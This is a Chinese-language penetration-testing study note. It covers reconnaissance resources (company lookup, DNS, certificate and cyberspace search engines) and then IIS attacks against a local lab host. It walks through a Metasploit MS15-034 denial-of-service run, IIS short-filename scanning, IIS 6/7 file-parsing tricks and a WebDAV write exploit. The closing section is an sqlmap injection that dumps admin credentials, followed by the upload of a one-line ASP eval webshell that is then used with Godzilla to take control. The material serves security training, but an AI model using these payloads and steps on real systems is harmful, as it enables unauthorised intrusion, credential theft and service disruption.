信息打点

应用信息打点–

标签 名称 地址
企业信息 天眼查 https://www.tianyancha.com/
企业信息 小蓝本 https://www.xiaolanben.com/
企业信息 爱企查 https://aiqicha.baidu.com/
企业信息 企查查 https://www.qcc.com/
企业信息 国外企查 https://opencorporates.com/
企业信息 启信宝 https://www.qixin.com/
备案信息 备案信息查询 http://www.beianx.cn/
备案信息 备案管理系统 https://beian.miit.gov.cn/
公众号信息 搜狗微信搜索 https://weixin.sogou.com/
注册域名 域名注册查询 https://buy.cloud.tencent.com/domain
IP反查 IP反查域名 https://x.threatbook.cn/
IP反查 IP反查域名 http://dns.bugscaner.com/
标签 名称 地址
DNS数据 dnsdumpster https://dnsdumpster.com/
证书查询 CertificateSearch https://crt.sh/
网络空间 FOFA https://fofa.info/
网络空间 全球鹰 http://hunter.qianxin.com/
网络空间 360 https://quake.360.cn/quake/#/index
威胁情报 微步在线 情报社区 https://x.threatbook.cn/
威胁情报 奇安信 威胁情报中心 https://ti.qianxin.com/
威胁情报 360 威胁情报中心 https://ti.360.cn/#/homepage
枚举解析 在线子域名查询 http://tools.bugscaner.com/subdomain/
枚举解析 DNSGrep子域名查询 https://www.dnsgrep.cn/subdomain
枚举解析 工具强大的子域名收集器 https://github.com/shmilylty/OneForAll
标签 名称 地址
指纹识别 在线cms指纹识别 http://whatweb.bugscaner.com/look/
指纹识别 Wappalyzer https://github.com/AliasIO/wappalyzer
指纹识别 TideFinger潮汐 http://finger.tidesec.net/
指纹识别 云悉指纹 https://www.yunsee.cn/
指纹识别 WhatWeb https://github.com/urbanadventurer/WhatWeb
指纹识别 数字观星Finger-P https://fp.shuziguanxing.com/#/
标签 名称 地址
网络空间 钟馗之眼 https://www.zoomeye.org/?R1nG
网络空间 零零信安 https://0.zone/
网络空间 Shodan https://www.shodan.io/
网络空间 Censys https://censys.io/
网络空间 ONYPHE https://www.onyphe.io/
网络空间 FullHunt https://fullhunt.io/
网络空间 Soall Search Engine https://soall.org/
网络空间 Netlas https://app.netlas.io/responses/
网络空间 Leakix https://leakix.net/
网络空间 DorkSearch https://dorksearch.com/
威胁情报 VirusTotal在线查杀平台 https://www.virustotal.com/gui/
威胁情报 VenusEye 威胁情报中心 https://www.venuseye.com.cn/
威胁情报 绿盟科技 威胁情报云 https://ti.nsfocus.com/
威胁情报 IBM 情报中心 https://exchange.xforce.ibmcloud.com/
威胁情报 天际友盟安全智能平台 https://redqueen.tj-un.com/IntelHome.html
威胁情报 华为安全中心平台 https://isecurity.huawei.com/sec/web/intelligencePortal.do
威胁情报 安恒威胁情报中心 https://ti.dbappsecurity.com.cn/
威胁情报 AlienVault https://otx.alienvault.com/
威胁情报 深信服 https://sec.sangfor.com.cn/analysis-platform
威胁情报 丁爸情报分析师的工具箱 http://dingba.top/
威胁情报 听风者情报源 start.me https://start.me/p/X20Apn
威胁情报 GreyNoise Visualizer https://viz.greynoise.io/
威胁情报 URLhaus 数据库 https://urlhaus.abuse.ch/browse/
威胁情报 Pithus https://beta.pithus.org/
业务资产：

1、WEB应用
2、APP应用

代码反编译：通过反编译应用程序 逆向工程：分析应用程序的二进制代码 网络嗅探：监听应用程序发送和接收的网络流量

3、PC端应用

静态分析：分析应用程序的二进制代码

动态分析：运行应用程序并监视其行为

端口扫描：扫描应用程序所在的服务器上的端口

4、小程序应用
5、微信公众号
6、其他产品等

利用爱企查：查找相关资产例如网址，邮箱，旗下公众号和app（付费会员拼多多1块钱7天）https://aiqicha.baidu.com/

利用小蓝本查找（免费）https://www.xiaolanben.com/WEB单域名：

1、备案信息 2、企业产权 3、注册域名 4、反查解析

利用备案查询网公死存在其他分公司的情况http://www.beianx.cn/

通过注册域名查询相关公司网址https://buy.cloud.tencent.com/domain

已知ip地址，反查网址https://x.threatbook.cn/

WEB子域名：

1、DNS数据 2、证书查询 3、网络空间 4、威胁情报 5、枚举解析

DNS数据查询DNSdumpster.com - dns recon and research, find and lookup dns records

证书查询https://crt.sh/（直接查找子域名）

网络空间https://fofa.info/

http://hunter.qianxin.com/

https://quake.360.cn/quake/#/index

Web架构资产：

1、程序语言 2、框架源码 3、搭建平台 4、数据库类 5、操作系统

[指纹收录平台 (shuziguanxing.com)

HTTP.SYS（CVE-2015-1635）
1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
4、漏洞复现

msfconsole

是==Metasploit Framework的命令行界面==，它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性，包括发现漏洞、开发和执行攻击、获取远程访问权限等。

use auxiliary/dos/http/ms15_034_ulonglongadd

是Metasploit Framework中的一个辅助模块，用于执行针对MS15-034漏洞（也称为HTTP.sys远程代码执行漏洞）的拒绝服务（DoS）攻击。这个漏洞影响Windows操作系统中的HTTP堆栈，攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃，从而实现拒绝服务攻击。**

set rhosts xx.xx.xx.xx
set rport xx
run

IIS短文件
1、漏洞描述

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
2、漏洞成因:

为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令dir /x
3、应用场景：

后台路径获取，数据库文件获取，其他敏感文件获取等

python iis_shortname_scan.py http://192.168.200.140:88/

选择对应的powereasy 网站，查看分配的ip地址
借助工具，输入执行语句和目标ip执行扫描
获取到对应的网站目录
4、利用工具：

https://github.com/lijiejie/IIS_shortname_Scanner
IIS文件解析

IIS 6 解析漏洞→可以上传木马文件，以图片形式或文件夹形式替换格式

    1、该版本默认会将***.asp;.jpg** 此种格式的文件名，当成Asp解析
    2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
    如：logo.asp;.jpg xx.asp/logo.jpg

IIS 7.x 解析漏洞
    在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
    应用场景：配合文件上传获取Webshell

IIS写权限

IIS<=6.0 目录权限开启写入，开启WebDAV，设置为允许
可以通过提交put包，进行写入文件（可置入木马，获得权限）
参考利用：https://cloud.tencent.com/developer/article/2050105

#ASP-SQL注入-SQLMAP使用&ACCESS注入

ACCESS数据库无管理帐号密码，顶级架构为表名，列名（字段），数据，
所以在注入猜解中一般采用字典猜解表和列再获取数据，猜解简单但又可能出现猜解不到的情况
Access数据库在当前安全发展中已很少存在，故直接使用SQLMAP注入，后续再说其他。

1.打开对应的UploadParsing网址，并使用其分配的IP进行访问

2.源码中，没有进行sql语句的过滤，直接拼接，造成有注入风险

http://192.168.200.140:89**/Pic.asp?classid=3**

​

3.使用sqlmap工具进行sql注入

G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap

python sqlmap.py -u “” --tables //获取表名
python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名
python sqlmap.py -u “” --dump -C “username,password” -T admin //获取表名下的列名数据

python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables

    python .\\sqlmap.py: 启动 SQLMap 工具，使用 Python 解释器运行。

    u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目标 URL，即要测试的网站地址。在这个例子中，目标 URL 是 http://192.168.200.140:89/Pic.asp?classid=3。u 选项用于指定 URL。

    -tables: 指定 SQLMap 工具执行的任务，这里是获取数据库中的所有表。-tables 选项用于请求表的信息。

    提示有注入点

​
​
它询问是否要使用常见的表存在性检查方法

    do you want to use common table existence check? [Y/n/q] y

    选择要使用的常见表文件的提示。用户可以选择默认的常见表文件，也可以选择自定义的常见表文件。

    询问用户要设置多少个线程进行测试

    please enter number of threads? [Enter for 1 (current)] 输入10

​

python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin

    -columns: 这是 SQLMap 的一个选项，用于指示工具查找指定表的列。

    T admin: 这是 SQLMap 的另一个选项，用于指定目标表的名称。在这里，它是 “admin” 表。

​
​
​
​
python .sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” –dump -C “username,password” -T admin

    -dump: 这是 SQLMap 的选项，用于指示工具从数据库中检索数据。

    C "username,password": 这是 SQLMap 的选项，用于指定要检索的列的名称。在这里，它是 “username” 和 “password” 列。

    得出如下的用户名和密码

​
​
由于密码是MD5加密的

使用解密解密出密码

​
​
​

4.使用IIS短目录或目录扫描（7kbscan御剑版）扫描找到后台登录页面

python iis_shortname_scan.py http://192.168.200.140:89/

    扫描出一些目录

    一一进行访问在访问时发现：http://192.168.200.140:89/upfile.asp

    会跳转到后台登录页面：http://192.168.200.140:89**/Tcnet/Admin_Login.asp**

​
​
​
​
​
​
目录扫描（7kbscan御剑版）

    直接将目标地址写入

    选择对应的字典类型和显示结果

    发现有跳转的页面直接访问至后台

​
​
​
​
网站爬虫
直接在网址检测中点击文件，查看目录和文件结构
直接查看网站前端源码

5.登录后台页面

6.模拟漏洞上传测试（只需要了解后面还会讲）

分别开启burp和浏览器的代理和端口

​
上传普通的小的照片

​
进行抓包，将包中的有关文件路径的内容，拼接上去**/1.asp;.(可以将木马文件，替换为该格式)**

再次抓包

​
将照片路径替换为：192.168.126.131:89**/1.asp;.20235192154599715.png**

    发现可以被当成Asp正常解析

    在抓包的后面加上木马程序的内容**<%eval request(”passs”)%>**
        <% 和 %>: 这是ASP脚本中的定界符，用于标识服务器端代码的开始和结束。
        eval: 这是一个函数或操作符，用于执行动态生成的代码。在这里，它被用于执行后面括号中的内容。
        request("passs"): 这部分看起来是从请求中获取名为 “passs” 的参数的值。request 是用于获取请求参数的对象，而 “passs” 是参数的名称。

    总体来说，这段代码的作用是从请求中获取名为 “passs” 的参数的值，并使用 eval 函数执行它。这种构造可能导致安全风险，特别是如果用户能够控制传递给 “passs” 参数的内容。eval 的使用通常被认为是不安全的，因为它允许执行任意的动态代码，可能导致代码注入攻击。

    使用哥斯拉，利用木马文件获得权限成功